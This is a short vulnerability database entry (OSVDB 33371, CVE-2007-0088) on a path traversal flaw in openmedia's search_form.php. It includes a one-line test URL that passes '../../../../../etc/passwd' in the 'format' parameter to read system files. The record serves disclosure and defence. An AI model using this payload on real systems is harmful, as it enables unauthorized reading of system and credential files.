openmedia search_form.php format Variable Traversal Arbitrary File Access

2007-01-02T02:28:26
ID OSVDB:33371
Type osvdb
Reporter OSVDB
Modified 2007-01-02T02:28:26

Description

Manual Testing Notes

http://[target]/search_form.php?lang=fr&format=../../../../../etc/passwd

References:

Related OSVDB ID: 33370 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0057.html ISS X-Force ID: 31258 CVE-2007-0088